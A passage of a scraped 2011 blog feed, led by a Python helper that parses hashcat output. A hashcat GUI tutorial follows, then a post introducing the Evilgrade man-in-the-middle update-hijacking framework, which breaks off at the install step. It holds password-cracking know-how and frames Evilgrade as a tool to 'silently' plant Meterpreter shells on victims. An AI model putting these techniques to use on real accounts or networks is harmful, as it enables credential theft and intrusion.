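def parse_line(line, sep=":", fmt="pass"):
    """Return (hash_part, plaintext) for one output line.

    fmt selects the outfile layout: "pass" is HASH:PASS, "hex" is
    HASH:HEX_PASS, "pass_hex" is HASH:PASS:HEX_PASS. Assumes the hash
    column itself contains no separator (true for unsalted hashes)."""
    line = line.rstrip("\r\n")
    if sep not in line:
        raise ValueError("separator %r not found in line %r" % (sep, line))
    if fmt == "pass":
        hash_part, plain = line.split(sep, 1)
    elif fmt == "hex":
        hash_part, hexplain = line.rsplit(sep, 1)
        plain = bytes.fromhex(hexplain).decode("utf-8", "replace")
    elif fmt == "pass_hex":
        head, hexplain = line.rsplit(sep, 1)
        plain = bytes.fromhex(hexplain).decode("utf-8", "replace")
        suffix = sep + plain            # the PASS column, which may contain sep
        if head.endswith(suffix):
            hash_part = head[: len(head) - len(suffix)]
        else:                           # non-UTF-8 plaintext: fall back to first sep
            hash_part = head.split(sep, 1)[0]
    else:
        raise ValueError("unknown output format " + fmt)
    return hash_part, plain


def split_output(lines, sep=":", fmt="pass"):
    """Parse all lines; return (hashes, unique_plains) preserving order."""
    hashes, plains, seen = [], [], set()
    for line in lines:
        if not line.strip():
            continue
        h, p = parse_line(line, sep, fmt)
        hashes.append(h)
        if p not in seen:
            seen.add(p)
            plains.append(p)
    return hashes, plains


def write_split(lines, hash_path, wordlist_path, sep=":", fmt="pass"):
    """Write the hash list (overwritten) and append the plaintexts to a
    wordlist file so it grows with every cracking run. Returns the counts."""
    hashes, plains = split_output(lines, sep, fmt)
    with open(hash_path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(hashes) + "\n")
    with open(wordlist_path, "a", encoding="utf-8") as fw:
        fw.write("\n".join(plains) + "\n")
    return len(hashes), len(plains)


def sample_lines(fmt="pass_hex"):
    """Constructed sample: MD5 of three throwaway plaintexts in the chosen
    format. "a:b" shows a plaintext containing the separator."""
    lines = []
    for plain in ("password", "123456", "a:b"):
        digest = hashlib.md5(plain.encode()).hexdigest()
        hexplain = plain.encode().hex()
        if fmt == "pass":
            lines.append(digest + ":" + plain)
        elif fmt == "hex":
            lines.append(digest + ":" + hexplain)
        else:
            lines.append(digest + ":" + plain + ":" + hexplain)
    return lines


if __name__ == "__main__":
    for fmt in ("pass", "hex", "pass_hex"):
        print(fmt, split_output(sample_lines(fmt), ":", fmt))
```

If you crack salted formats whose hash column is stored as hash:salt, count the columns from the left instead of splitting on the first separator; the hex formats sidestep the problem entirely, which is a good reason to prefer them for the output file.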
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Let us now review the three (3) different GPU tools available and how and when to use them: oclHashcat/cudaHashcat, oclHashcat-plus/cudaHashcat-plus, and oclHashcat-lite/cudaHashcat-lite.&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;cudaHashcat/oclHashcat (Tab2):&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;There is cudaHashcat/oclHashcat which can be used for BruteForcing MD5, MD4, NTLM, DCC, SHA-1, and MySQL hashes. It is handy for bruteforcing a Large Hash list after exhausting all of your dictionaries. It also has the ability to apply rules to either side of the password combinations being tried (left vs. right side). This tool will take the default built in charsets or customer user defined charsets and will run much faster than any CPU bruteforce attempts. You can define the charset to use by using the mask feature and identifying the number of characters to use. You would need to define 4 on one side and 4 on the other to try all possibilities for 8 character hash. 
Here is a overview of what can be used to define how you want to perform this hybrid attack:&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpFirst" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?l = lowercase alpha (abcdefghijklmnopqrstuvwxyz)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?u = uppercase alpha (ABCDEFGHIJKLMNOPQRSTUVWXYZ)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?d = numerical digits (0123456789)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; 
text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?s = !"#$%&amp;amp;'()*+,-./:;&amp;lt;=&amp;gt;?@[\]^_`{|}~&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?h = ISO-8859 characters from 0xc0 - 0xff&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?D = 8bit characters from German alphabet&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New 
Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?F = 8bit characters from French alphabet&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?R = 8bit characters from Russian alphabet&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?1 = number one - use custom charset 1 (uses whatever you copy into the empty field)&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?2 = number two - use custom charset 
2&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpMiddle" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?3 = number three - use custom charset 3&lt;/span&gt;&lt;/div&gt;&lt;div class="MsoListParagraphCxSpLast" style="margin: 0in 0in 0pt 45pt; mso-add-space: auto; mso-list: l2 level1 lfo3; text-indent: -0.25in;"&gt;&lt;span style="font-family: Symbol; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;"&gt;&lt;span style="mso-list: Ignore;"&gt;·&lt;span style="font-family: &amp;quot;Times New Roman&amp;quot;;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: Calibri;"&gt;?4 = number four - use custom charset 4 &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 0pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt 0.5in;"&gt;&lt;span style="font-family: Calibri;"&gt;?l?l?l?l ?l?l?l?l would define a password of 8 characters in length using all lowercase alphabet as charset to try all possibilities: aaaaaaaa-zzzzzzzz.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img101.imageshack.us/img101/6461/65259251.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img101.imageshack.us/img101/6461/65259251.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;The custom charset can be used as needed, but I find them helpful to add specific combinations to the end or beginning of the passwords being used in the word list, for example you could define custom1 as 1, custom2 as 2, custom3 as 3, and custom4 as 4 and to define the last 4 characters as 1234, which depending on your placement can create a whole new dictionary. I have found ending with 123 has very high success rates on real life samples. &lt;/span&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;&lt;span style="mso-tab-count: 1;"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;?l?l?l?l ?1?2?3?4 would define a password of 8 characters and would fix 1234 as the last four characters of each password attempted, from aaaa1234-zzzz1234. Hopefully you can see how this can be helpful when all dictionary attempts have been exhausted and/or you have some helpful information to help you narrow down the possibilities to be used - since you can define the placement and characters to be used in the attempts.&lt;span style="mso-no-proof: yes;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img814.imageshack.us/img814/5646/72829665.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img814.imageshack.us/img814/5646/72829665.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;If you decide to use a dictionary instead of masks you can also combine rules to them as well on a left and right side basis, same as masks and custom charsets above, just fill out the details for the mandatory fields. I tend to reserve my dictionaries for the next tab though, so I will not cover that part here. The last thing to complete before running the GPUs at things is the Resources section. You will need to define the GPU(s) to be used. If they are all the same type then do nothing and it will use them all together, however if you have a mix match of cards like I do (due to budget reasons) then you can simpy define them using comma separated values. I use two different cards and it will only use one by default so I change the GPU devices to state "1,2" to instruct it to use both GPU #1 and GPU #2. You will find better results if you run the same type of cards, but this is a perfectly acceptable and working alternative for those that grow on a budget or over time. If you do a little research or are more familiar with your GPU then you can tweak your heart out with the workload tuning and GPU loops but the defaults will be fine for the average users. Finally choose to write your output file to where you want in the desired format and you can start the GPU attacks on your hash list. You will notice the command used is also displayed next to the start button if you want to learn the commands to do things from the console. This is also very helpful if you pause an attack and need to pick things up later, as the commands can be rather long and you can simply copy and paste it to where you need it. 
Once you hit start the command prompt should open and show the running status, you can the "S" button to show the status at any given time.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img52.imageshack.us/img52/8638/49114901.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="208" src="http://img52.imageshack.us/img52/8638/49114901.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;oclHashcat-plus/cudaHashcat-plus (tab3):&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;This was also formerly known as oclHashcat+/cudaHashcat+ and has recently been changed to the new name. This GPU tool is used to replace the outdated CPU cracker that we originally all came to love and known as Hashcat, and is very good for single or large lists of MD5, MD4, NTLM, DCC, and DES hashes. This takes your Dictionary and Password files and runs the same attacks on them that Hashcat would, but instead of using the CPU it uses the GPU power, which results in exponentially faster results. &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img860.imageshack.us/img860/4972/84309989.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img860.imageshack.us/img860/4972/84309989.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Like on tab1 for Hashcat we will need to point it to our Hash list file, choose to remove cracked hashes or not, point it to your dictionary or password files (as many as you have or need - haven't hit the limit yet), identify hash type. Now you can’t choose attack modes here but you can point it at your rules files which will do way more than the default attack modes will ever do, so not much loss here. If you want to let the tool auto-generate rules based on the developer’s statistical analysis you can do that as well and define how many rules to generate. 
As done on the oclHashcat/cudaHashcat you will need to define your GPU cards to use in the attack if they are not of the same kind and adjust any of the other parameters if you are advanced enough to know what you are doing. Choose to write the output and format type if desired and that is it. As before it will open the command prompt for you and start running the dictionary attacks off the GPU devices identified. &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img801.imageshack.us/img801/3535/63746218.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img801.imageshack.us/img801/3535/63746218.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;Once it is running it will look similar to before, and you can use the "S" for up to date status check, "h" for help dialogue, or "q" to quit: &lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img838.imageshack.us/img838/8726/28686570.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="208" src="http://img838.imageshack.us/img838/8726/28686570.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;b style="mso-bidi-font-weight: normal;"&gt;&lt;u&gt;&lt;span style="font-family: Calibri;"&gt;oclHashcat-lite/cudaHashcat-lite (tab4):&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;This GPU tool is a bit more precise and can only be used on a single hash at a time, but is capable of cracking MD5, SHA-1,MySQL &amp;gt; 4, NTLM&amp;lt; and Domain Cached Credentials (DCC) hashes at extremely fast rates.&lt;/span&gt;&lt;/div&gt;&lt;div 
class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img546.imageshack.us/img546/6796/92855324.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img546.imageshack.us/img546/6796/92855324.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;This can be very handy when you have a high priority hash and want to focus everything you have on brute-forcing it. You will also need to define the mask to use if desired, or you can simply provide the charset to use and the min and max parameters for the password length. You can also instruct the tool to take the charset in hex form by checking the available box.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img825.imageshack.us/img825/1394/81058864.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://img825.imageshack.us/img825/1394/81058864.png" t8="true" width="276" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;As for the previous tabs, you will need to identify your GPU devices and tweak any advanced parameters you want. Lastly, choose whether to write the output to a file, and where, and you are ready to fire away.&lt;/span&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://img36.imageshack.us/img36/8282/70953514.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="208" src="http://img36.imageshack.us/img36/8282/70953514.png" t8="true" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="MsoNormal" style="margin: 0in 0in 10pt;"&gt;&lt;span style="font-family: Calibri;"&gt;This completes the overview and review of the latest release from the Hashcat team, Hashcat-GUI-v0.4.2. I hope you have enjoyed this review and that you find this tool very useful in your hash cracking adventures. If you want to speed things up you can also run one attack from the GPU tools while simultaneously running an attack from the CPU-powered Hashcat tab. I use this method regularly to allow the CPU to handle the small rule sets I have and let the more complex rules run through the GPU to save time. You can also let brute-forcing of shorter lengths run on the CPU while running anything over 7 characters long on the GPUs to save yourself some time. Enjoy, and follow up with the makers of the tool as it is being updated all the time and they never seem to stop amazing me. If you have a small problem or need some help please feel free to comment or drop me a line and I will do what I can to help out with GUI or console problems. This was not meant to be an end-all-be-all of tutorials or overviews, but I do think it is a very helpful and quite amazing tool and wanted to share it with the world. Have fun cracking...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-family: Calibri;"&gt;&lt;strong&gt;UPDATE -&amp;nbsp;Here is the video I made to accompany the article above:&lt;/strong&gt;&lt;/span&gt;&lt;br /&gt;
&lt;iframe allowfullscreen="" frameborder="0" height="349" src="http://www.youtube.com/embed/RuZUpplRkF8" width="560"&gt;&lt;/iframe&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8671806905307905831-655439925196301472?l=kaoticcreations.blogspot.com' alt='' /&gt;&lt;/div&gt;
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/655439925196301472/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/06/cracking-password-hashes-with-cpu-gpu.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/655439925196301472?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/655439925196301472?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/lRMd95ez0WE/cracking-password-hashes-with-cpu-gpu.html" title="Cracking Password Hashes with CPU &amp; GPU Power" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://img.youtube.com/vi/RuZUpplRkF8/default.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/06/cracking-password-hashes-with-cpu-gpu.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A08NSHY7eyp7ImA9WhZUEEw.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-3389283795241801672</id><published>2011-06-02T08:03:00.001-05:00</published><updated>2011-06-02T08:04:59.803-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-06-02T08:04:59.803-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous Proxies" /><category 
scheme="http://www.blogger.com/atom/ns#" term="FREE" /><category scheme="http://www.blogger.com/atom/ns#" term="Anonymous" /><category scheme="http://www.blogger.com/atom/ns#" term="Proxy List" /><category scheme="http://www.blogger.com/atom/ns#" term="Free Anonymous Proxies" /><category scheme="http://www.blogger.com/atom/ns#" term="Free Proxy" /><category scheme="http://www.blogger.com/atom/ns#" term="Free Elite Proxies" /><category scheme="http://www.blogger.com/atom/ns#" term="Free Proxies" /><category scheme="http://www.blogger.com/atom/ns#" term="Free List" /><category scheme="http://www.blogger.com/atom/ns#" term="Proxy" /><category scheme="http://www.blogger.com/atom/ns#" term="Proxies" /><category scheme="http://www.blogger.com/atom/ns#" term="Elite" /><category scheme="http://www.blogger.com/atom/ns#" term="Elite Proxies" /><title>FREE PROXIES PAGE ADDED</title><content type="html">Hey Folks, I have added a whole new page dedicated to free elite and anonymous proxies. I will be updating it weekly to keep it fresh and useful for anyone that wants to use it. It can be found via the link below the page header. Hope you appreciate this service and find it useful. If so, make sure to leave a comment or two and let me know.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8671806905307905831-3389283795241801672?l=kaoticcreations.blogspot.com' alt='' /&gt;&lt;/div&gt;
</content><link rel="replies" type="application/atom+xml" href="http://kaoticcreations.blogspot.com/feeds/3389283795241801672/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://kaoticcreations.blogspot.com/2011/06/free-proxies-page-added.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/3389283795241801672?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8671806905307905831/posts/default/3389283795241801672?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/CWtAZ/~3/zra1IUhzizE/free-proxies-page-added.html" title="FREE PROXIES PAGE ADDED" /><author><name>HR</name><uri>http://www.blogger.com/profile/05957795383670307007</uri><email>noreply@blogger.com</email></author><thr:total>0</thr:total><feedburner:origLink>http://kaoticcreations.blogspot.com/2011/06/free-proxies-page-added.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEYAR3Y_fSp7ImA9WhZWF0s.&quot;"><id>tag:blogger.com,1999:blog-8671806905307905831.post-5213415480444261358</id><published>2011-05-18T18:42:00.000-05:00</published><updated>2011-05-18T18:42:26.845-05:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-05-18T18:42:26.845-05:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Man In the Middle" /><category scheme="http://www.blogger.com/atom/ns#" term="ISR EVILGRADE" /><category scheme="http://www.blogger.com/atom/ns#" term="Meterpreter" /><category scheme="http://www.blogger.com/atom/ns#" term="Evilgrade 
Framework" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploiting Updaes" /><category scheme="http://www.blogger.com/atom/ns#" term="MiTM" /><category scheme="http://www.blogger.com/atom/ns#" term="Ettercap" /><category scheme="http://www.blogger.com/atom/ns#" term="MiTM Attacks" /><category scheme="http://www.blogger.com/atom/ns#" term="Exploits" /><title>SILENTLY Owning the Network with ISR EVILGRADE</title><content type="html">Evilgrade is a modular framework designed to take advantage of HD Moore &amp;amp; Dan Kaminsky's DNS exploits in tandem with insecure application update mechanisms to inject and execute Meterpreter shells or your RAT almost entirely SILENTLY on fully patched Windows and OSX machines. This tool works by using man-in-the-middle techniques (DNS, ARP, DHCP, etc.) to exploit a wide variety of applications. Today I am going to show you the basics of how to get it properly installed and set up, as well as how to use it to pull off some really amazing techniques to pwn victims on your network (WLAN &amp;amp; LAN only, folks). Before we begin I should point out that I will be performing this on the new BT5 platform (GNOME edition) as it already comes with Metasploit and the other tools needed to pull off MiTM attacks. You will also need to download a copy of Evilgrade to your BT5 Desktop, which can be downloaded from the homepage found at the following location: &lt;a href="http://www.infobyte.com.ar/developments.html"&gt;http://www.infobyte.com.ar/developments.html&lt;/a&gt;&lt;br /&gt;
(just click on the download link in the bottom right). This tutorial will be done almost entirely from the command prompt, so please don't ask why you couldn't double-click, point and shoot to make it work. I will classify this one as Intermediate in nature as it is all from the command line and requires some initial steps to get it working. If you are at all familiar with working on Cisco routers or other IOS-type CLI environments then this will be a piece of cake. Let's begin, try to keep up...&lt;br /&gt;
&lt;br /&gt;
You will need to start by extracting Evilgrade once it has been downloaded from the homepage; for this you can use the following command:&lt;br /&gt;
&lt;br /&gt;
Command: tar -zxvf&lt;br /&gt;
root@bt:~/Desktop/EvilGrade2.0# tar -zxvf isr-evilgrade-2.0.0.tar.gz&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; NOTE: you can add the -C argument followed by a path if you want to extract it&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; to a location other than where it is sitting after it was downloaded&lt;br /&gt;
